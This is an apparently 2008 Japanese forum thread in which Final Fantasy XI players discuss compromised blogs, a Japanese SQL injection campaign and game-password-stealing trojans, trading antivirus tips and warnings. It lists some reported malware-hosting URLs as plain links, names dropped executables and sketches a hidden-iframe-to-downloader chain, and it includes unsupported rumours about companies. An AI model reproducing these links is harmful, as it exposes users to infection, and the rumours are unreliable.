Windows Script Encoder かよ^^;

91 :既にその名前は使われています:2008/03/12(水) 18:15:29.54 ID:HB4FRxAS
2chの関連スレでもFC2は評判良い方ではないからなあ。
むやみやたら様々なサービスに手を広げて適当に放置しているような印象。
余りにも手を広げすぎたせいか、聞いた話によるとSiteでCGI公開しているような
趣味の人に見境無くオファーを出しているという事が有ったらしい。
案件の詳細は伏せつつ、報酬額決定をオファー先に委ねるという感じの。

それがホントかは知らないけど、昨今の状況から正直FC2は
お勧めできるとは言い難いサービスだと思う。

92 :既にその名前は使われています:2008/03/12(水) 18:16:32.31 ID:MKZtSNNv
>>90
うん。久しぶりに見た。
VBScriptだけかと思ったらJScriptも通るのな。

93 :既にその名前は使われています:2008/03/12(水) 18:27:01.01 ID:APShacGb
Asciiコード化
URLエンコード
Ascii HighBit
encode()
スクリプトの難読化だけでもネタいっぱいダナ
ポチるだけでMalwareToolKitが自動作成するのかねぇ^^;

94 :既にその名前は使われています:2008/03/12(水) 18:28:15.26 ID:8CoexmK9
>>88
自分そうやって分けてるけど
Macでも時々ウィルスもらってるぞ
(FF関連ではなさそうだが)
だから安心しきらずMacでもセキュリティはちゃんとした方がいいと思う

95 :既にその名前は使われています:2008/03/12(水) 18:51:59.75 ID:ZIXRWN6n
某青さんのとこ見たけど、クリーンインストールした
PC二台使い分けてだめなら、クライアント側で
できることねーじゃん?(´_ゝ`)

サーバー側つつかれたとしか考えられねーよwww

96 :既にその名前は使われています:2008/03/12(水) 20:34:34.12 ID:7gWLa9Yj
200番台緊急保守

97 :既にその名前は使われています:2008/03/12(水) 20:37:04.60 ID:tm75A6Dk
57のはニコニコではなくメイプルストーリーとURLに書いてあるが…FFなのに何故にネクソンのメイプル?

98 :既にその名前は使われています:2008/03/12(水) 20:45:55.85 ID:MKZtSNNv
メイプルの垢ハックもあるんすよ。
台湾方面で。

99 :既にその名前は使われています:2008/03/12(水) 20:50:03.07 ID:M21DHHan
日本のサイトを狙ったSQLインジェクション攻撃が急増
ttp://www.itmedia.co.jp/enterprise/articles/0803/12/news112.html
感染サイトのURLは「www.2117966.net」となっており、閲覧者が気付かないようにマルウェアを感染させる可能性がある。
同社によれば、このマルウェアはオンラインゲームの情報をPCから盗み出すタイプだと推定されるという。

これってFFも対象?
2117966.netは CNドメインで登録住所はデタラメ
しこまれてるのはfuckjp.jsってスクリプトらしい。

100 :既にその名前は使われています:2008/03/12(水) 20:50:19.99 ID:Uh4ryp2P
某エレ○ンのリンクをクリックしたらPGブロック。
リストは対策室のだけなんだけど・・・
なにを信用したらいいのかわからん。

101 :既にその名前は使われています:2008/03/12(水) 20:51:55.88 ID:MKZtSNNv
>>99
それは商用サイト狙いじゃないかなぁ。
少なくともブログにSQLは使わんし。

102 :既にその名前は使われています:2008/03/12(水) 20:52:30.67 ID:M21DHHan
連投失礼
IPはコリアヤフーの広告ぽい。

103 :既にその名前は使われています:2008/03/12(水) 20:52:34.65 ID:60JnqpmX
FC2ブログ再改竄の件が不気味すぎる。
アクセスログ握ってる運営側が協力してくれないって…。

104 :既にその名前は使われています:2008/03/12(水) 21:07:20.99 ID:7gWLa9Yj
>>97
紛らわしいドメインを大量にとって
ウイルス置き場にしてる

105 :既にその名前は使われています:2008/03/12(水) 21:10:59.22 ID:MKZtSNNv
>>99
降ってくるのは0.exeとxp.exe(スクリプト多すぎなので他にもあるかもしれん)。
AntiVir、Kasperskyでいずれも撃墜。

106 :既にその名前は使われています:2008/03/12(水) 22:18:07.00 ID:mK9JP7mk
俺さ、ブログ巡回する時はRSS使ってるんだけど
(livedoorやGoogleのサーバータイプのやつ)
仮に仕込まれていても、これなら安全だよね?

これも安全でないなら、FC2の使用の所は
RSSからもはずそうと思ってるんだが…

107 :既にその名前は使われています:2008/03/12(水) 22:33:53.57 ID:MKZtSNNv
>>76 の再スキャン。
ttp://www.virustotal.com/analisis/2a77abb11af3b565638f4e57a48fb7a8
カスペはえーな…。

108 :既にその名前は使われています:2008/03/12(水) 22:35:31.38 ID:r+eMBHNc
中華の罠を見つけたんで気をつけてくれよな!

www■2ch22■com/2ch00358/00358■zip

Domain name: 2ch22■com
Registrant Contact:
fly bg
bg fly nuigiym2@163■com
0597-2809666 fax: 13605909415
fujianlongyan
longyan Fujian 364000
cn
Created: 2008-03-04

109 :既にその名前は使われています:2008/03/12(水) 23:50:20.11 ID:MKZtSNNv
zipやrarをわざわざ解凍して踏むような人までは面倒見れんw

110 :既にその名前は使われています:2008/03/13(木) 00:02:38.74 ID:r+eMBHNc
>>109
しかし意外とそういうものこそ未対応の新種だったりしてな。
>>108のやつには00356■zipと言うのもあって、そっちはやばかった。
VIRUSTOTALで12日23時時点で検出したのは2つだけ。
カスペ、NODも華麗にスルー。
使ってるところにだけ検体を提出しといたわ。

111 :既にその名前は使われています:2008/03/13(木) 00:42:20.72 ID:7vvzHddW
ねるまえの保守
fc2のは原因解明してくれないと怖いなー

112 :既にその名前は使われています:2008/03/13(木) 00:52:04.90 ID:yUCf7QUF
社員が業者に売ってるんじゃない

113 :既にその名前は使われています:2008/03/13(木) 02:14:38.07 ID:azrqgEMc
ほすあげ!

114 :既にその名前は使われています:2008/03/13(木) 05:17:11.73 ID:WLgaUvl0
おはようあげ。

115 :既にその名前は使われています:2008/03/13(木) 05:25:10.92 ID:Kdo3iNbf
【ネット】トレンドマイクロのウイルス情報ページが改ざん…閲覧者にウイルス感染のおそれ [08/03/12]

これ、今朝の毎日だか読売新聞だかに
「オンラインゲームのIDとかの情報盗むやつと思われる」
とか載っててさらに吹いたw
まさかwwwwwww

116 :既にその名前は使われています:2008/03/13(木) 06:12:25.11 ID:n2vOnz3S
読売に載ってるね。
これを見る限り、どこのサイトを見てもウイルス感染の危険性があるってことだよね。
そのうちに中国はサイバーテロ国家に認定されんじゃねぇか?


117 :既にその名前は使われています:2008/03/13(木) 08:04:56.85 ID:ZMg6eBPB
hoshu

118 :既にその名前は使われています:2008/03/13(木) 08:25:09.23 ID:idfpErbW
ええい、日本のスーパーハカーは何をやってるんだw

まあでも、流石にここまでやられると■eも腰を上げてくれるんじゃね

119 :既にその名前は使われています:2008/03/13(木) 08:36:24.31 ID:Slq9ptja
>>118
そんなもんはいないw
国産のアンチウイルスが皆無っつーのも珍しいわ

120 :既にその名前は使われています:2008/03/13(木) 08:53:44.67 ID:Xm7v7+B6
トレンドは、元々は中国ソフト会社だ。
コスト削減で度重なる不具合を出して会社な。

数年おきに導入PCに致命的不具合を出し騒がれる会社でもある。


ちなみに1年ほど前に不具合出した後、国内でパターン等のリリース前のテストをやっていたが、少し前にコスト削減で海外に出した。




つまり、信用に値しない会社だ。

121 :補足:2008/03/13(木) 08:54:59.28 ID:Xm7v7+B6
ちなみに海外委託後、速攻で不具合だしたお。

122 :既にその名前は使われています:2008/03/13(木) 09:26:59.23 ID:Slq9ptja
中国っつーか台湾ね。

123 :既にその名前は使われています:2008/03/13(木) 09:32:29.95 ID:yUCf7QUF
不具合じゃなくて故意だったりしてね

124 :既にその名前は使われています:2008/03/13(木) 10:08:39.49 ID:hHD/2t0F
チョコボの絵筆 もやられたっぽい?
ページがみあたりませんになるが
キャッシュで最後の方のエントリーが見れる。
怪しい事が書かれてるね…
ちなみにテンプレ 改ざん チョコボの絵筆 で
検索すると、非公開の見出しが
見れるが…

被害拡大してね?

125 :既にその名前は使われています:2008/03/13(木) 10:31:53.48 ID:tYn5kDAt
俺はバスターを使い手なのだが

他のソフトに代えるか・・・
マカフィーはPG2と相性悪いようだし、カスペにでもしてみっかね。

126 :既にその名前は使われています:2008/03/13(木) 10:41:04.29 ID:9iwhsg69
自分もソフト変えようかと思ってます。
今はノートンだけど、カスペにしてみたい。
でもソフトの評価で「カスペは色々設定あるから初心者には厳しいかも」と載ってたのですが、
そんなに設定難しいのかなぁ・・・困った><

127 :既にその名前は使われています:2008/03/13(木) 10:43:09.02 ID:R9bTn0eU
フリーのウィルス対策ソフト・スパイウェア対策ソフトって大丈夫ですか?
いままでずっとavast(別マシンではAVG)と、SpyBot使ってるんですが。
ちょくちょく定義ファイル更新あるし、フリーでも大丈夫だと今まで思っていたけど、不安になってき
た・・・
有料のを買ってきたほうがいいんだろうか。
ウィルスバスターなりノートンなり。

128 :既にその名前は使われています:2008/03/13(木) 10:44:06.55 ID:Slq9ptja
>>126
設定はデフォルトでガチガチに厳しくしてあって、取捨選択していく感じ。
軽くなったと見せかけるために
デフォルト設定がスッカスカなのよりは安心な方式だと思う。

129 :既にその名前は使われています:2008/03/13(木) 10:44:56.31 ID:Slq9ptja
>>127
その2つよりはavastのがいいと思う。
AVGやAntiVirのがよりいいと思う。

130 :既にその名前は使われています:2008/03/13(木) 11:20:01.02 ID:5JJ3DOfB
TSPY_ONLINEG.DAU
形式 : トロイの木馬型
別名 : オンラインゲーム

影響を受けるシステム : Windows 98, ME, NT, 2000, XP, Server 2003
暗号化 : なし 感染報告 : 低 システムの影響 : 高 情報漏えいの危険性 : 高

特徴: これは一般的に「トロイの木馬」に分類される不正プログラムです。

影響を受けるソフトウェア:Windows 98, ME, NT, 2000, XP, Server 2003
「TSPY_ONLINEG.DAU」の動作は以下のとおりです。
システムに自身をインストール
情報漏洩
キー入力操作情報を収集
ゲームやアプリケーションのアカウント情報を収集

侵入方法:スパムメールに添付され侵入 他の不正プログラムに作成され侵入
悪意のあるWebサイトを介して侵入 ユーザの手動ダウンロードにより侵入


131 :既にその名前は使われています:2008/03/13(木) 11:20:15.01 ID:HnmNYBbQ
とりあえず■eにメールしようぜ。
「怪しいサイトには行くな」って、
現状だとウィルス対策ソフトを売ってる会社のサイトすら
見に行くなって話になる。

132 :既にその名前は使われています:2008/03/13(木) 11:27:49.25 ID:x6n9OnvC
とうとうLSメンバーやられた
疲れたから解約する、だってさ
GMのマニュアル対応にもカチンときたらしい

「ノーヴィオとれた、ひゃっほーい!」「マジすげいなwwwww」
って言ってたばっかだったのに・・・
■の対応がこのままなら、ヴァナ崩壊の日も近いかもね・・・

133 :126:2008/03/13(木) 11:31:14.22 ID:9iwhsg69
>>128
ありがとうございます、カスペ買ってみることにします!

134 :既にその名前は使われています:2008/03/13(木) 11:33:12.09 ID:HnmNYBbQ
メールしてきたは。
ttps://secure.playonline.com/support/exmf.html#stt

おまいらも出すと良いと思うよ!

135 :既にその名前は使われています:2008/03/13(木) 11:38:33.19 ID:S3LphSTg
業者関連の事は、俺もう何年もう幾度となくメールしてきてるが…
懲りずにまたするつもりだけどさ、でも

以前スクエニがテコ入れした時、業者にDOS攻撃掛けられてサーバーダウンしてた事あったよな?
企業と総会屋みたいに体の好いいところで手を打つかたちで
今は裏で業者と密通してんじゃないの?
なーんかここまで放置して、形だけの漏れある修正や
イタチごっこ程度の元を断たない垢バンごっこの繰り返しているの見てるとそう思えるよ
ユーザー側の不意な過失による小さな不利益なんて考えていないというか
故意に看過している気がする
問題が社会的に大きくならんと動かないんじゃね?

結局守るのは自衛しかないんだよな

136 :既にその名前は使われています:2008/03/13(木) 11:42:20.61 ID:5S2kyIjT
思い立ったが吉日ですぐ買い替えに走るのもいいが、まずは体験版を入れてみては銅貨?

137 :既にその名前は使われています:2008/03/13(木) 11:46:44.75 ID:Xm7v7+B6
カスペは未知のウィルスに弱いと言われてるので注意な。
ただ、パターンにより対応が気が狂ったように早いのが売りだと思う。


avastはフリーのわりには良いけど、アジア産ウィルスの対応速度についてはカスペなどに劣るよ。



つーか未知のウィルスに完全対応なんて無理だし、基本的にfwで遮断しろよ。

138 :既にその名前は使われています:2008/03/13(木) 11:55:27.88 ID:tYn5kDAt
>>127
avast!もAVGもウィルス対策だけだから、
別途ファイアウォールも入れておかないと危ないね。

139 :既にその名前は使われています:2008/03/13(木) 12:09:09.24 ID:TuDldQeU
体験版は1ヶ月使えるし、じっくり試すのはいいね
パターンはその間こまめに更新するだろうし

ひとまず今月はその金でルーターを買うのがいい
モデム=ルーター=PCとするだけでもそこそこ安全度が増す
その上でセキュリティー、スパイウエア対策することで直つなぎよりは
かなり安全度が増す

完全じゃないという奴もいるかもしれないが、まっぱ状態で
つないでるよりは全然違う。

140 :既にその名前は使われています:2008/03/13(木) 12:11:42.69 ID:kEiNrZnQ
今FC2ブログ使ってる奴は
引っ越しを考えた方が良いな。
自分のブログ見に来てくれた人が罠にかかって引退とか泣くわ。

141 :既にその名前は使われています:2008/03/13(木) 13:46:52.50 ID:hHD/2t0F
まぁ他も安全な保証はないけどな…
シマンテックも改ざんされる位だしwww

142 :既にその名前は使われています:2008/03/13(木) 14:03:30.62 ID:Slq9ptja
トレンドマイクロとESETだろ

143 :既にその名前は使われています:2008/03/13(木) 14:13:16.19 ID:L3a8OnEL
ブログ大手ではなくて、
日に数人しか来ないようなブログで被害にあった人はいるのかねー?

144 :既にその名前は使われています:2008/03/13(木) 14:23:56.63 ID:Slq9ptja
閑古鳥ブログだと本人が気がつかない限りそのままじゃね?
誰も来なきゃ被害も本人だけ。

それはそうと試しにFC2にアカ取ってみたけど、書くことがない。

145 :既にその名前は使われています:2008/03/13(木) 14:27:16.33 ID:L3a8OnEL
閑古鳥ブログで被害にあった人いるなら、
どこか怪しいサイト踏んでしまったのかと思えるけど
大手だけが被害にあっているなら、直接狙われてる可能性の方が高いのかなぁと

146 :既にその名前は使われています:2008/03/13(木) 14:30:15.69 ID:TuDldQeU
タイトルでFFXI関係のとこをねらってる可能性もありそうだな

カウンターとかおいてりゃ1日あたりどんくらい見てるとかわかるし
そういうとねらえば効率もいいとか思ってそうだ

147 :既にその名前は使われています:2008/03/13(木) 14:35:13.32 ID:DaQ2jwr9
>>144
書くことないのにどうしてブログ垢とったんかはわからんが
普通にリアル日記でも書いてればいいんじゃね? そこまでは被害広がってないし

報告されてるのが個人の情報系有名ブログだけってのが怖いな
たまたまパス拾ったFFブログをハックしたってより
業者が作為的に標的を選んだって感じがする

148 :既にその名前は使われています:2008/03/13(木) 14:42:08.75 ID:L3a8OnEL
>>78のサイト、「FFXIorFF11、FC2、blog」
の3つのワードでぐぐって上位の方に来るのばっかりだったわ。
他の上位のサイト怖くてふめねーw

149 :既にその名前は使われています:2008/03/13(木) 14:49:22.29 ID:DaQ2jwr9
>>78はどれもFF11+FF11的キーワードのタイトルだな
タイトルで振るいをかけて狙ってる可能性もありそうだ

150 :既にその名前は使われています:2008/03/13(木) 14:54:18.07 ID:x6n9OnvC
>>149
お前は何を言ってるんだ?

151 :既にその名前は使われています:2008/03/13(木) 14:57:00.93 ID:TuDldQeU
何に突っかかってるのかがさっぱりわヵらん

152 :既にその名前は使われています:2008/03/13(木) 15:00:01.53 ID:hHD/2t0F
>>142
そうだった、素で間違えたわ、スマソ。

しかしこれだけ見事に上位ブログ
ばっかりだと、狙われてるでしょ、コレ…
つまり管理者のパス抜いたっつーか
直接FC2サーバーにアクセスかね?

153 :既にその名前は使われています:2008/03/13(木) 15:00:06.85 ID:k+RWJjfl
「ぺってん」とか「戦士」とか「黒猫」が「FF的タイトル」ってどんだけ後遺症だよって話じゃね?w


154 :既にその名前は使われています:2008/03/13(木) 15:01:34.08 ID:f1xj/CzE
“FF11”+“FF11的キーワード”を“FF11+FF11”的キーワードと
解釈したんでないか


155 :既にその名前は使われています:2008/03/13(木) 15:05:07.89 ID:L3a8OnEL
>>153
そのブログ全部、FFXIかFF11ってちゃんとタイトルにはいってるんよw


156 :既にその名前は使われています:2008/03/13(木) 15:06:10.08 ID:rfm5mI1E
3つとも正式タイトルだと「FF11」か「FFXI」が入ってる。
ぺってんと黒猫は「ペット狩り」が入ってるし、「戦士」はまんまジョブ名だな。

157 :既にその名前は使われています:2008/03/13(木) 15:10:29.05 ID:tIqDotg1
トレンドマイクロのサイト改ざん、閲覧でウイルス感染も : 社会 : YOMIURI ONLINE(読売新聞)
http://www.yomiuri.co.jp/national/news/20080312-OYT1T00829.htm?from=navrkw

>インターネットセキュリティー会社「ラック」によると、同様の攻撃は11日夜から12日にかけ、
>国内の企業や団体のサイトを対象に急増しており、通常の70〜100倍に上るという。
>ラックでは「感染するウイルスはオンラインゲームの情報を盗み出すタイプと推定される。
>自分が開設したサイトが改ざんされていないか点検してほしい」と呼びかけている。

ウイルス対策ソフト会社をハッキングするくらいなら
FC2くらい余裕でやれそうだよねえ

158 :既にその名前は使われています :2008/03/13(木) 15:35:48.80 ID:fNANyHE7
過疎でモチベ下がって課金停止してるとこに垢ハックきたw
もちろん引退解約だ、業者は嫌いだがBANも考えもんだな
やつら本気だぞ、エクレア以外全部無くなってたwwww
過疎+業者垢ハックでヴァナ崩壊シナリオ始まったな


159 :既にその名前は使われています:2008/03/13(木) 15:38:30.62 ID:hHD/2t0F
FF11+赤白黒ナイトあたりはゴロゴロと
ありそう。
FC2+FF11+ジョブという検索だったとしたら
次はライブドアとかそんな感じ?

160 :既にその名前は使われています:2008/03/13(木) 15:40:31.44 ID:R9bTn0eU
すんません
何の脈絡もなくフレのblogに貼られてたんですが・・・
リンク先見てしまいましたが、鬼忍やら何やらと全く関係ない記事が1件載ってるだけ。
田口なんちゃらというHNの人にこころあたりも無いし。
fc2だし、怪しい?ような気がして不安です。
いまのところウチの環境では無反応ですが、ここはどうでしょう?
考えすぎでしょうか



No.36 忍ソロ記事メインのブログです 田口浩正 [2008/03/13(木)10:25:06]

FFXI 鬼忍withマートキャップの話題(装備、メリポ、rep)を中心に紹介しています。
その他に、各種コンテンツや青魔道士、侍の話題など。

http://hooyudejp.blog71.fc2.com/


161 :既にその名前は使われています:2008/03/13(木) 15:42:48.56 ID:yjISmaHK
どう見ても典型的な業者サイトwwwwwwwwww

もはや開くまでもにぃ

162 :既にその名前は使われています:2008/03/13(木) 15:46:28.72 ID:L3a8OnEL
>>159
FF+FC2の検索で上位にきた他の大手が被害にあってないなら
+ジョブの検索していると考えられるねえ。とても頭良い方法とは思えないが。

有名ブログとか詳しくないが、よく名前見かける気がする検索上位FC2ブログ
ぱひる、さくら、魔法のふで、ひっそり
ここいらは被害にあってないのだろうか・・・

163 :既にその名前は使われています:2008/03/13(木) 15:47:43.29 ID:f1xj/CzE
>>160
既出の罠サイトmegaretic.org、baodongo.orgへご案内
今すぐウイルスチェックを
念のためにPOLのディレクトリを一時リネームしておくといいかもしれない

164 :既にその名前は使われています:2008/03/13(木) 15:55:14.23 ID:USP3LY9N
>>162
そこらは被害遭ってないかも。
共通するのは他ブロガーとの交流が少ない、
ランキングや相互リンクなどに積極的じゃない。
宣伝はTBPのみ積極的ってとこかねぇ。

ちなみに俺のブログへの罠コメはアク解とか見たら
FC2ランキング参加ブログの相互リンク集から来ていて
過疎ブログを含めてランキングブログのリンク先に同一罠コメ来てたよ。

165 :既にその名前は使われています:2008/03/13(木) 15:56:30.07 ID:TuDldQeU
>>160
とりあえず田口浩正にわろたw

まあリンクだけならあれだが飛んだならチェックだな

166 :既にその名前は使われています:2008/03/13(木) 15:56:47.16 ID:N9ZMERLK
>>160
自分のブログにも同じコメントが書かれていた
書きこんだ相手のIPがもろCNだったのでさっくり削除
本当に皆さん気をつけて…

167 :既にその名前は使われています:2008/03/13(木) 15:58:18.82 ID:Slq9ptja
>>147
いやー、ブログの垢抜かれるとかあんの? とか罠コメを集めてみよう! みたいな
ハニーポット的な意味合いも含めネトゲアカハック日記みたいにしようかな( >>87 )
なんて思って取ったんだけど、なんかめんどくせー。
テキストエディタでHTML書いてFTPでアップみたいな世代だからなのかもしれんが。

168 :160:2008/03/13(木) 15:59:17.45 ID:R9bTn0eU
うぁ
なんか踏んだPCのシステム時計が2000年になってる!
PC全体がなんか重いし。
これは完全に・・・
というかavast無反応なんですが、どうにかする方法ないですか?

169 :既にその名前は使われています:2008/03/13(木) 16:03:46.08 ID:TuDldQeU
>>168
とりあえずカスペルスキー オンラインスキャン でググってスキャンしる
もしウイルス見つかれば体験版落として削除

むろん出来うるなら、再インスコ

170 :既にその名前は使われています:2008/03/13(木) 16:08:33.48 ID:k+RWJjfl
>155
いや、俺は知ってるけど>150がそう思ったんじゃね?って話ねw

>156
「戦士」は(ry

171 :既にその名前は使われています:2008/03/13(木) 16:12:06.63 ID:MCQXE5nb
>>168
もしPS2持ってたら急いでそっちからパス変えとき。

172 :既にその名前は使われています:2008/03/13(木) 16:12:10.14 ID:n2vOnz3S
>168
俺も素人だからよく分からんが、
POLのパス変更⇒POLのディレクトリの一時リネーム⇒カスペオンラインスキャンの
順の方が良いんじゃないか?



173 :既にその名前は使われています:2008/03/13(木) 16:14:22.00 ID:x6n9OnvC
>>155>>170
いや、オレが言いたいのはオンラインゲームの垢抜きウイルス仕込むのに
そのオンラインゲームの名前を冠したブログが狙われるって当たり前のことを
さもオレが気づきましたよ風に書かれても困るって意味でつっこんだ

174 :160:2008/03/13(木) 16:24:15.92 ID:R9bTn0eU
http://www.kaspersky.com/kos/jpj/partner/default/kavwebscan.html
カスペルスキーオンラインスキャンってこれでいいんですか?
承諾して実行すると、

ウイルス定義データベースをアップデートするまでお待ちください
URLからダウンロードします: ftp://downloads4.kaspersky-labs.com
リモートファイルをダウンロードしています: master.xml

ここで止まってます
もしかしてウィルスが悪さして定義ファイルのダウソすら邪魔することってありますか?

FF入ってるPCじゃないので、POLのほうは大丈夫ですが。

175 :既にその名前は使われています:2008/03/13(木) 16:24:26.59 ID:hHD/2t0F
>>158
なんか踏んだ?

176 :既にその名前は使われています:2008/03/13(木) 16:29:57.31 ID:7d4UPpLm
カスペはどうなのか知らんがオンラインスキャンへのアクセスやアンチウイルスソフトの
インスコを妨害するウイルスはある。

177 :既にその名前は使われています:2008/03/13(木) 16:34:10.44 ID:Slq9ptja
>>168
iframeの先のさらにiframeの先のスクリプトでダウンローダ型のexeが実行され
こいつがFF11・リネージュ・ROの3匹のパス抜きをダウンロードし実行。

セキュリティスカスカでスクリプト込みで全部動けば都合4匹exeが実行されている。
2/20製造(それほど新しくはない)で先月各社に提出済みなんだけど
avastやAVGやBitDefenderやNOD32って返事ないんだよね。

時計戻すのはネトゲトロイでやる意味がないので
単純な故障かもしれんよ。不安ならリカバリ。

178 :既にその名前は使われています:2008/03/13(木) 16:35:16.05 ID:TuDldQeU
>>174
そこでいいよ
最初は必要なファイルを落とすのに結構時間かかる
あまりに遅いなら体験版落とすべし

179 :既にその名前は使われています:2008/03/13(木) 16:42:41.87 ID:4Km1hreE
トレンドマイクロのウイルス情報ページ、改竄されたのは9日21時頃から
http://internet.watch.impress.co.jp/cda/news/2008/03/13/18790.html

180 :既にその名前は使われています:2008/03/13(木) 16:45:00.35 ID:f1xj/CzE
悪名高き163data.com.cnのホストが最近検索に使ったキーワード
「ff11 武器 2008」、「ff11 攻略 2008」
いずれもyahoo.co.jpから。以前はgoogle.comも使っていた
数としては検索よりリンクをたどったり、リファラなしで来るほうが多い

181 :既にその名前は使われています:2008/03/13(木) 16:48:35.45 ID:Slq9ptja
中華ならbaidu.jp使えよとか思った

182 :既にその名前は使われています:2008/03/13(木) 17:01:33.67 ID:x6n9OnvC
baidu.jpって中国本土からはアクセス規制かかってた気がする

183 :既にその名前は使われています:2008/03/13(木) 17:01:38.77 ID:f1xj/CzE
>>181
まったくだ
と思って百度で検索したらヒットしなかった
そりゃ来ないわなww

「おまんこについて」というサイトはヒットするというのにwww

184 :既にその名前は使われています:2008/03/13(木) 17:43:52.37 ID:tUJcz1Zt
あぐ

185 :既にその名前は使われています:2008/03/13(木) 17:43:55.04 ID:cebZ6MQn
最近はdrecom.jpに罠ブログやパクリブログを作るケースが散見されるので注意してくれよな!


ttp://ffxihcol1■blog■drecom■jp/

パクリ、いまのところ罠のIFRAMEは確認出来ない
ttp://ff11playonlanei■blog■drecom■jp/

186 :既にその名前は使われています:2008/03/13(木) 17:49:02.37 ID:jrv/asMx
アゲアゲ!

187 :既にその名前は使われています:2008/03/13(木) 17:56:29.66 ID:gWi8/dV7
新装備2 008/3/13 15:45
新装備といいつつテクスチャの張替えしかないので新鮮味が無いなーNPC用?にトゲトゲした新規の手足装備があるっぽいです。
ttp://ffxihcol1.blog.drecom.jp/ (←罠なので見ないほうがよさげです)
58.22.224.253

アドレスついてたのでIPサーチで検索してみた。

inetnum: 58.22.224.0 - 58.22.239.255
netname: CNCGROUP-FJ-LONGYAN-MAN
country: CN
descr: Longyan city, fujian provincial network of CNCGROUP
admin-c: LY987-AP
tech-c: LY987-AP
status: ALLOCATED NON-PORTABLE
changed: chenmin_deletethispart_@china-netcom.com 20060710
mnt-by: MAINT-CNCGROUP-FJ
mnt-lower: MAINT-CN-LY28
source: APNIC

福建省出そうな。とりあえずブログの管理会社に中国からのアクセスはじけるような設定くれと頼んでみる。

188 :既にその名前は使われています:2008/03/13(木) 18:00:12.29 ID:7d4UPpLm
>>187
URL削れ、hだけ削っても専ブラだとリンク扱いになるんだよっ

189 :既にその名前は使われています:2008/03/13(木) 18:03:42.75 ID:TuDldQeU
>>188
アドなかったら情報にもならんだろ

まあせめてドットを他の物に変えるとかぐらいで

190 :既にその名前は使われています:2008/03/13(木) 18:09:37.38 ID:gWi8/dV7
>>188.189
専ブラの使い手じゃないので気が回らなかった。
すまん。きをつける(´・ω・`)

191 :既にその名前は使われています:2008/03/13(木) 18:17:39.51 ID:eaSW8Eqq
セキュリティ会社HPすらハックされるんなら
11公式もそのうち・・・とか考えちゃうな。

192 :既にその名前は使われています:2008/03/13(木) 18:18:37.90 ID:6o7Lkm7q
罠ブログの可能性があるブログ会社
FC2 ジュゲム ドリコム

193 :既にその名前は使われています:2008/03/13(木) 18:19:52.02 ID:Slq9ptja
>>185
上 デリられた模様。検体入手できず。
下 罠なし。
>>187
デリられた模様。検体入手できず。

194 :既にその名前は使われています:2008/03/13(木) 18:20:48.83 ID:Slq9ptja
>>192
サーパラ

ジュゲムは現物見たことがないので判断保留。

195 :既にその名前は使われています:2008/03/13(木) 18:22:25.54 ID:cebZ6MQn
>>192
ライブドアも忘れないでおくれ。


196 :既にその名前は使われています:2008/03/13(木) 18:23:00.04 ID:DaQ2jwr9
>>194
ジュゲムはハッキングはないが、罠サイトは報告あるよ

今のところ
FC2,ジュゲム、ドリコム、サーパラで最も危険なのがFC2

197 :既にその名前は使われています:2008/03/13(木) 18:23:02.65 ID:4UsBp8Nf
日本海の海底ケーブル切断で解決しないか?

198 :既にその名前は使われています:2008/03/13(木) 18:24:47.60 ID:hHD/2t0F
結局殆どで吹いたwww

199 :既にその名前は使われています:2008/03/13(木) 18:33:09.16 ID:cebZ6MQn
ライブドアの罠ブログ
罠は通報するとライブドアが”確認して対処します”と返答をよこし丸1月以上立つのだが
未だ大絶賛無対策放置。

罠、記事はリネブログのパクリ。
ttp://blog■livedoor■jp/ahirun1/
ranninpへのステルスIFRAME、珍しく幅だけ30を指定

仮にこのブログを消しても何故かIDは残すので、
他のサービス(フレバ、Wikiなど)で悪事を働ける。
このことからライブドアはある意味FC2以上に危険。


200 :既にその名前は使われています:2008/03/13(木) 18:33:58.78 ID:DaQ2jwr9
まあ罠ブログだけならどこでも作れるからな・・・w
リンク貼れたらそれだけで事足りる
現状怪しいURLは開かない■eご推奨wの防衛手段で回避できない
悪質な被害が出てるのはFC2

てか、セキュリティ会社まで改竄されてるって言うのに
いつまで■eは怪しいURLは踏むなで済ませる気なんだ

201 :既にその名前は使われています:2008/03/13(木) 18:44:53.51 ID:cebZ6MQn
ライブドアブログにおいてはこの事例を決して忘れてはいけない。

ブログ乗っ取り
blog■livedoor■jp/baby_babr_baby_music


202 :既にその名前は使われています:2008/03/13(木) 18:54:54.50 ID:aHBl8air
IEの設定でIFRAME無効にしたけど効果あんの?

203 :既にその名前は使われています:2008/03/13(木) 19:35:40.06 ID:pDiD2dce
ゴロツキ国家は市ね

204 :既にその名前は使われています:2008/03/13(木) 19:49:18.22 ID:7FpSUMow
>>200
そこまでいったら■云々だけの問題ではないような。
■が何かしたってウィルスが消えるわけでもないからね。
アカウントやらアイテムやらは取り返せるかもしれんが
無事なのはゲーム内のものだけだからなぁ。

205 :既にその名前は使われています:2008/03/13(木) 20:00:14.75 ID:tYn5kDAt
IE6の使い手なのだが、FireFox試してみて俺には使いづらかった。

IE6ではブラウザの設定を「高」にして
IFRAME・Java・スクリプト・ActiveX全て無効。
Cookieも全てブロックにしてる。

206 :既にその名前は使われています:2008/03/13(木) 20:04:17.56 ID:DaQ2jwr9
>>204
いや、■eは警察か何かか?それw
過去スレでなんどもでてるような認証方法の見直し、アイテムの補償制度のことだよ

207 :既にその名前は使われています:2008/03/13(木) 20:14:32.05 ID:Slq9ptja
>>199
あー…だめだなそこは…。
通報即デリのFC2やサーパラやドリコムのがまし。

208 :既にその名前は使われています:2008/03/13(木) 20:18:24.59 ID:7FpSUMow
>>206
ん、だから■がそれをしてくれたとしても
無事なのはゲームのアイテムだけで
PC自体は無事じゃないからねーってこと。
■云々だけではもうどうにもならないなーって話だよ。

209 :既にその名前は使われています:2008/03/13(木) 20:34:36.42 ID:DaQ2jwr9
>>208
セキュリティ会社のHP云々ってあたりでグローバルな話と勘違いされてるのか?
上でネトゲパスを盗むトロイの可能性が高いみたいな事書いてあったから
あくまでネットゲームの範疇で言ったつもりだったんだ

そんなグローバルなことじゃなくって
いち運営会社が運営会社としてできる対応を考えろってことだ
認証方法の見直しってのはPOLのことな

>>205
FireFoxはアドオンいれてなんぼだべ

210 :既にその名前は使われています:2008/03/13(木) 20:44:31.33 ID:AODctOay
罠サイトを直リンしてるやつ、わざだろ?
通報するぜ

211 :既にその名前は使われています:2008/03/13(木) 20:44:34.76 ID:yUCf7QUF
進学、就職で引退者が増える時期にハッキング被害の引退者も加わるのか
今月末でどれだかユーザーが減るのかな
まぁ、いままで問題放置してきた■が今更対策とるとは思えない

212 :既にその名前は使われています:2008/03/13(木) 20:54:24.02 ID:rzgfFjCJ
罠サイト対策とるまでやるのは流石に無理だぞ、ゲーム会社は

